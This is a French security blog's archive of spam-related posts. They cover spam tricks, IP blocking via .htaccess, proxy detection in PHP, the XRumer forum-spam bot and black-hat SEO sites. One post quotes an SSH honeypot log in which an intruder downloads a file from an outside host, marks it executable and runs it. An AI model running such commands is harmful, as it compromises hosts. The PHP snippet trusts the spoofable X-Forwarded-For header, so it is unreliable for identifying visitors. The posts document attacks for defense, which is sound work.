photo of devloop

devloop :: blog

sécurité informatique, programmation, Linux et plus encore

Subscribe to RSS feed

Posts tagged with "spam"

Kamoulox 2

,

Le retour...


C'est sûr qu'un fer à repasser dans le jean ne doit pas faire du bien...
Je me pose des questions sur les outils de traduction utilisés confused

Euh... Kamoulox ?

, , ,


Je reste dubitatif sur les nouvelles techniques de spam (et de scam) de certains...

Will you guard my back. And the hCursor field gives us the cursor image...

, ,

Les techniques des spammeurs évoluent. Après les fautes d'orthographes intentionnelles, les images publicitaires, les images représentant une url vers un site publicitaire, ils se mettent à intégrer du texte trouvé sur Internet qui sera considéré valide par les filtres anti-spam.
Jusque là rien de bien nouveau. Ce qui est plus inquiétant c'est qu'ils commencent visiblement à personnaliser leurs pourriels en fonction du destinataire.

J'ai reçu deux spams dans ma boîte, chacun contenant des extraits de textes relatifs à la programmation, aux réseau ou à l'informatique en général.
En recherchant sur Google j'ai identifié un document sur TCP/IP, Les Versets Sataniques (pdf), des textes d'auteurs russes, un procès relatif à DeCSS ou encore le manuel de rar en ligne de commande...

A ce gloubi-boulga étrange est joint une image vantant les produits d'une pharmacie canadienne.

Ce qui est sûr c'est ce que mélange attire la curiosité. Je vous ait gardé quelques lignes pour le plaisir :

(...)
Will you guard my back. And the hCursor field gives us the cursor image that is used when the cursor is over the window we will create. Hopefully it will be up again soon. However, as the saying goes, there is no such thing as a free lunch.
(...)
The last thing I wanted was to be stuck on a vegetarian planet with some weird, hat-tipping people who didn't believe in money. This forces the data attribute of this file to be non-resident. If it hadn't been the middle of the night and no pen and paper handy, I would have done so right then. The four parts are combined in a notation called dotted quad, which means each 8-bit value is separated by a period.
(...)

Nouveau spammeur ?

, ,


Celui-là a demandé 2038 pages du blog. Certes réparties sur 3 jours mais toujours en continu. Je lui ait accordé le bénéfice du doute puisque son IP n'était listée nul part (un nouveau robot à la Pompos ?) puis je l'ai finalement bloqué avec mon htaccess qui est actuellement :
<Limit GET>
order allow,deny
deny from 74.52.68.226
deny from 206.83.210.191
deny from 75.126.23.186
deny from 209.160.72.10
deny from 222.130.155.44
deny from 64.92.164.138
deny from 195.225.177.
allow from all
</Limit>

Bye bye mister 64.92.164.138
Vous pouvez aussi trouver une liste d'adresses IP de spammeurs mise à jour automatiquement ici. La liste est générée à partir d'un système du type honeypot (enregistre les tentatives de pourrissage de formulaires, les scans ssh etc)

Informatique en vrac

, , , ...

Les bidouilleurs de chez Doom9 continuent leur analyse du standard de protection AACS. Dernièrement ATARI Vampire est parvenu à trouver une (sub) Device Key du logiciel WinDVD 8.
Au niveau algorithmique cette clé se situe juste avant la Processing Key. La découverte n'apporte rien de plus (en tout cas pour le moment) mais on peut saluer l'exploit technique.
Sur Slashdot, la nouvelle est discutée, ça parle entre autres du système de révocation de AACS et on se demande si les groupes derrière la protection vont bientôt mettre ce système en marche.

Pour mieux comprendre le fonctionnement de tout ça je vous invite à lire mon précédent billet sur AACS ou encore mieux une explication du standard par arnezami nommée Understanding AACS (including Subset-Difference).

J'aurais bien aimé lire cette doc, seulement je suis très occupé en ce moment. Il faut dire que je suis un peu seul dans les bureaux de l'entreprise où je bosse actuellement puisque 90% des employés sont en grève (vidéo France3) et réclament une hausse des salaires.
Etant en CDD, je ne participe pas à ce mouvement mais j'espère qu'une solution sera trouvée rapidemment qui puisse satisfaire tout le monde. Demain mes collègues vont débuter leur 4ième journée de protestation.

Et pendant ce temps là en France... le gouvernement travaille à nous fournir un Internet plus sûr censuré, commercial, et sous surveillance.

Reprenant deux propositions d'un groupe de travail sur la cybercriminalité, le Gouvernement a décidé de créer un pôle unique de signalement des sites à contenus illicites et un certificat de sûreté des contenus proposés sur la toile.
(...)
Annoncé par le Premier ministre lors du Comité interministériel sur la société de l'information (Cisi) du 11 juillet 2006, un "label citoyen" sera mis en place cette année pour certifier la sûreté des contenus. Il distinguera, parmi les fournisseurs d'accès à internet et de services en ligne, ceux qui s'engagent pour une plus grande sécurisation des usages.


Reste à savoir qui va décider ce qui est, ou non, un contenu illicite et quel sera exactement le rôle des FAI dans cette histoire (un bon gros filtrage liberticide comme en Chine ou la fermeture sauvage de sites Internet sans même prendre soin de prévenir leur propriétaire).
On tente alors de nous rassurer sur le côté démocratique de cette mise en cage de l'Internet français en ces termes :

Selon les recommandations faites en avril 2006 par le Forum des droits sur l'internet, une telle marque de confiance comporterait 70 engagements.


On suppose alors que le gouvernement s'est concerté avec le fameux Forum des droits sur l'internet afin de ne pas faire n'importe quoi...
On se rend alors sur le site du Forum des droits sur l'internet (un lien est présent depuis la page du gouvernement) et on télécharge l'"Avis du Forum des droits sur l'internet sur le projet de Commission nationale de déontologie des services de communication au public en ligne" au format PDF...

Mais l'avis du Forum est tout sauf rassurant comme l'explique ces permières lignes :

En premier lieu, les acteurs déplorent qu'une concertation ouverte à l'ensemble des acteurs marchands et non marchands n'ait pas eu lieu sur un texte de cette importance.


C'est beau la démocratie !

Le dossier du grouvernement continue sa plaidoirie en nous rappelant sa lutte contre le spam et la mise en place de la plateforme signal-spam.
J'en avais parlé à son lancement. On nous avais fait différentes promesses, notamment la possibilité de signaler du spam. Cette fonctionnalité aurait dû être disponible durant le dernier trimestre de l'année précédente mais rien n'a été fait.
D'ailleurs on peut toujours lire sur la page : "Le site Signal Spam permettra bientôt aux utilisateurs enregistrés de signaler des messages de spam".. "Bientôt" ça fait une, deux ou trois années ?
Sans compter le blog en silence radio depuis le 14 Septembre 2006 mad

Mais ce qui fait le plus peur dans cette page c'est sans doute l'information suivante :

Parallèlement, le Réseau national de télécommunications pour la technologie, l’enseignement et la recherche (Renater), qui relie un grand nombre d’organismes français, a pour mission d’assurer en toutes circonstances la sécurité du réseau, notamment lors de la mise en œuvre des plans anti-terroristes.

C'est pour dire dans qu'elle merde on est ! bigsmile Certes le CERT-Renater se tiens informé des dernières failles de sécurité mais nous fait aussi part des intrusions hebdomadaires dont il est victime (voir les STAT) et pour un réseau censé nous protéger des attaques terroristes ce n'est pas très rassurant p

De toute façon on s'en fout, après tout nos centrales nucléaires sont encore moins bien protégées...

Le plus simple serais de ne pas relier les réseaux les plus sensibles à Internet. Ca éviterait par exemple de voir un pirate réussir à bloquer le réseau de distribution d'essence argentin par l'intrusion dans le S.I. du secrétariat à l'Energie du pays.

Mais personne ne semble s'intéresser à la protection de l'information, surtout pas les entreprises qui utiliseront la suite bureautique de Google, rendant leurs données accessibles à une multinationnale américaine.

Heureusement que les membres du projet Honeynet sont là pour nous rappeler les problèmes de sécurité concernant les applications web par le biais d'un document nommé Know your Enemy: Web Application Threats.
Certes rien de nouveau mais c'est un bon concentré des failles web existantes et ça parle aussi des honeypots PHP smile
On regrettera éventuellement l'absence d'un paragraphe sur les attaques par Cross-site Request Forgery (CSRF)

Les spammeurs ne savent plus quoi inventer

, , , ...

Ca fait maintenant quelques semaines qu'un spammeur tente régulièrement d'ajouter des commentaires sur le blog sans jamais y parvenir. Cela est sans doute dû à la présence d'un système de captcha.

Le spammeur en question est facilement reconnaissable dans les logs :

Premièrement l'identité de son navigateur est toujours la même : un Maxthon (un navigateur avec onglets basé sur IE) sous un système Windows 2000.

Deuxièmement, il utilise toujours des proxies transparents (facilement détectables). Malheureusement sa véritable adresse IP n'est jamais la même, tout comme celle des proxies (il doit utiliser un botnet), rendant le blocage par IP impossible.

Enfin, et c'est la nouveauté, il utilise comme référant une url correspondant à un billet pris au hazard dans la blogosphère.
Les urls correspondent majoritairement à des blogs français, piochés au hazard sur Canalblog ou HautEtFort. Mais d'autres urls correspondent à des blogs anglais et/ou des blogs indépendants (qui ont leur propre nom de domaine).

Je trouve ça assez illusoire de penser que le fait de mettre comme référant des blogs existants puisse suffire à passer les filtres anti-spams qui se basent principalement sur le contenu du message.
Au début j'ai pensé qu'il s'agissait de referer spam (a.k.a. spamdexing) mais après étude des sites apparaissant dans les logs, force est de constater qu'ils sont totalement inoffensifs et ne cherchent pas à vendre quoi que ce soit.

Cette technique est d'autant plus étrange que le référant ne contient pas une seule url... mais PLUSIEURS !!
En effet 3 ou 4 urls sont mises à la suite, séparées par une virgule et un %20 (le caractère d'espacement en hexa). Dans cette liste on trouve parfois l'url d'un billet provenant du blog sur lequel le spammeur est actuellement en train de "travailler".
(cliquez sur l'image pour l'agrandir)

L'hypothèse que ce soit une fuite d'historique de Maxthon m'a traversé l'esprit mais l'utilisation répétée de proxies m'a rapidement fait oublié cette idée. De plus je ne trouve aucun lien dans les sites référants pointant vers mon blog.

Tout ça pour dire qu'on a ici affaire à une technique complétement inefficace et facilement identifiable à coups de code PHP... c'est juste lassant de devoir implémenter un filtre pour un seul péquin.

XRumer : un robot spammeur de forums

, , , ...

Il y a pas mal de temps maintenant, je vous avais parlé d'un générateur de splogs (voir Wikipedia: Splog) qui créait automatiquement des blogs sur la plateforme Blogger afin de faire de la pub pour tel ou tel logiciel/site Internet.

Dans un article tout frais de Brian Krebs, on nous apprend l'existence d'un logiciel baptisé "XRumer" qui permet de spammer des forums en masse.
Sur le site du vendeur de ce robot spammeur, on peut voir une vidéo Flash pour le moins impressionnante qui donne un apperçu des fonctionnalités de la bête.

Le cheminement utilisé par le logiciel est le suivant :
  • Tout d'abord (étape non affichée dans la vidéo), XRumer fait appel à un outil du même créateur nommé "Hrefer". Ce dernier part à la recherche de forums par le biais de différents moteurs de recherche. Les forums recherchés sont principalement les plus utilisés (phpBB, IPB, VBulletin...)
  • Par un seul click de bouton, un compte email est généré aléatoirement sur un service mail gratuit.
  • Ensuite le robot se charge de s'inscrire sur chaque forum en fournissant l'adresse email générée auparavant.
  • Afin de valider les inscriptions le robot va se logger sur la boite mail et ouvrir les liens de validation de compte envoyés par les forums.
  • Dernière étape : le robot se connecte sur les forums et y poste un spam en nouveau topic.

La procédure suivie est pour le moins logique et c'était seulement une question de temps avant que ce type d'outil n'apparaisse. D'ailleurs certains cas laissent supposer que la technique était déjà étudiée depuis quelques temps.

Ce qui est plus génant c'est (il faut l'avouer) que le logiciel semble être particulièrement bien réalisé : on peut lancer jusqu'à 50 threads en parallèle pour augmenter la vitesse, utiliser des proxies... le logiciel parvient même à décoder les captchas !!
La page officiel du logiciel rassemble la liste de ses fonctionnalités

Comme quoi les protections contre le spam ne tiennent qu'à un captcha...

Détection de proxy en PHP

, , , ...

Certains spammeurs utilisent des proxies pour déverser leurs saletées sur la blogosphère et éviter les blocages au niveau de leur adresse IP (ce qui peut se faire avec les htaccess).
C'est le cas de notre fameux "megalan.bg" que la blogosphère connaît bien p
Le truc c'est que ce dernier utilise des proxies "transparent" c'est à dire... qu'on peut voir à travers !! (surprenant non ?) En fait sa véritable adresse IP est envoyée dans les requêtes HTTP par l'entête X-Forwarded-For. Il suffit donc de récupérer cette adresse IP en question pour connaître la véritable adresse du visiteur.

Ce qui donne :
if(isset($_SERVER['HTTP_X_FORWARDED_FOR']) && $_SERVER['HTTP_X_FORWARDED_FOR']!="")
{
  if(strchr($_SERVER['HTTP_X_FORWARDED_FOR'],','))
  {
    $tab=explode(',',$_SERVER['HTTP_X_FORWARDED_FOR']);
    $proxy=$tab[count($tab)-1];
    $realip=$tab[0];
  }
  else
  {
    $realip=$_SERVER['HTTP_X_FORWARDED_FOR'];
    $proxy=$_SERVER['REMOTE_ADDR'];
  }
}
else $realip=$_SERVER['REMOTE_ADDR'];

Vous pouvez ensuite ajouter quelques lignes comme :
if($realip=="213.240.225.101")
{
  // evil code
}

Et le tour est joué smile

Note: certains hébergeurs (Lycos pour ne pas le citer) détectent automatiquement l'utilisation d'un proxy et placent la véritable IP dans $_SERVER['REMOTE_ADDR']

SPAM, SPAM, SPAM, SPAM, sausage, eggs and SPAM

, , , ...

I don't want SPAM !!

C'est d'ailleurs pour cela que le blog est équipé en captcha, gri-gri et autres amulettes anti-spammeurs wizard
Et ça marche (surtout le captcha) mais ça ne stoppe malheureusement les tentatives infructueuses (il va falloir que je change de sorcier).

En attendant les techniques évolues, ainsi ils utilisent un référant bidon correspondant à une recherche google fictive.
Mais c'est facilement détectable puisque :
  • Par exemple je n'ai jamais publié une "image de chanbord" (avec la faute)
  • Le spammeur utilise un proxy transparent (Dotclear mémorise sa véritable IP)
  • Il utilise toujours le même proxy (donc blocable par htaccess ou autre)


Et puis je serais surpris qu'il existe des webapps laissant passer aveuglément tout visiteur venant soit disant d'un moteur de recherche... mais qui sait (c'est comme les chauves-souries enragées). Puis il y a de l'idée.

Sur mon honeypot ssh aussi ils semblent s'améliorer :
passwd
uname -a
ls
cd /tmp
ls
cd /var/tmp
ls
cd var
ls
id
is
su ftp
ftp
su
su root
bash -a
sh
wget
wget http://alam-batu.de/sig.bmp;chmod +x sig.bmp;./sig.bmp
cd /tmp

Celui-là semble avoir choisit l'exploit en fonction de la version du kernel (il y a de l'espoir, surtout pour un pirate roumain - priv8 j0k3) p mais il n'est pas resté longtemps (trop limité Kojoney) :/

Blog de spammeur

, , , ...

Après mon billet spammeur de blog, je continue mes investigations dans le monde des spammeurs car, comme l'a jadis dit Sun Tzu dans son Art de la Guerre, il faut connaître son ennemi pour mieux le combattre.

Hier je suis tombé (je ne saurais plus vous dire comment) sur le site Army Of Blogs (armyofblogs.com) qui vend vante (lapsus révélateur ?) les mérites de tout un tas de logiciels dit "marketting" et dont la blogosphère se serait fort bien passée.
Même si quelques logiciels présentés sur le site ne font qu'automatiser des techniques connues pour augmenter le PageRank d'un site, d'autres sont moins propres.

Par exemple on trouve quelques logiciels destinés à la création massive de splogs ( armyofblogs.com/voodoo-blogger-revisted ), un clonneur de blogs WordPress ( armyofblogs.com/wordpress-cloner-preview/ ) ou encore différents outils de spam par referer ( armyofblogs.com/prstorm-back-in-business/ , armyofblogs.com/stealth-advertiser-review/ ) yuck

Si j'ai trouvé ce blog plutôt qu'un autre c'est peut-être que son auteur utilise de temps en temps les mots auquel on a recours (spam*). La plupart du temps les spammeurs se cachent derrière les termes "Black Hat SEO", SEO signifiant Search Engine Optimization.

Bonne nouvelle pour nous, bloggeurs, il semblerait qu'il n'y ait pas vraiment d'outils de sping (spam de trackback)... C'est du moins ce que Bud Wiser (comme il se fait appeler) disait dans un billet de décembre 2005 ( armyofblogs.com/how-to-trackback-spam-step-by-step/ )

Toutefois comme les trackbacks sont juste du XMLRPC, un simple navigateur peut effectuer ces tâches et les moteurs de blogs utilisés par les spammeurs sont tout à fait capable de faire ça. Cela dis ça peut être rassurant de savoir que s'ils utilisent un navigateur ils s'exposent comme tout le monde à certains risques wink

Dans tous les cas on ne peut pas s'empécher de rire quand ces types se mettent à pleurnicher parce qu'on les interdit de spammer ( armyofblogs.com/effective-spamming-2/ ) ou qu'ils piquent leur colère parce que certains procédés anti-spam fonctionnent ( armyofblogs.com/army-of-blogs-and-the-nofollow-tag/ , armyofblogs.com/defeating-the-captcha-and-section-508/ )

Des champions de la mauvaise foi p
En tout cas avec ces quelques mots clés (Black Hat SEO) ce sera bien plus facile de garder un oeil sur ce petit monde wink

PS: Il n'y a pas de liens directs vers le site afin de ne pas lui accorder le plaisir d'augmenter son PageRank